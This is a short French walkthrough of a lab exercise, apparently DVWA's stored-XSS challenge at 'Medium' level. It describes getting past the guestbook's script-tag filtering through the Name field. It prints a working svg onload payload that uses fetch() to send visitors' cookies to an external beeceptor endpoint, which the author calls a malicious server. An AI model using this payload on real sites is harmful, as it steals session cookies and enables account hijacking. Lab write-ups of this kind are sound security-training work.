Niveau "Medium"

Pas de changement sur le guestbook :

Il n'est pas possible ici d'exécuter une popup alert() simplement. En effet, les balises <script> </script> semblent être filtrées et le champ "Message" semble également échapper le caractère """ (et donc sans doute également le caractère "'") :

Je vais me concentrer sur le champ "Name" étant donné qu'il semble être plus permissif. Je tente tout d'abord de passer par une autre balise afin d'exécuter notre javascript :

Cela fonctionne. Il me reste plus qu'à améliorer ma payload afin de récupérer les cookies des visiteurs :

<svg onload="fetch('https://dvwaxssrefl.free.beeceptor.com?cookie=' + document.cookie);">

L'attaque fonctionne, le cookie du visiteur est envoyé vers mon serveur malicieux :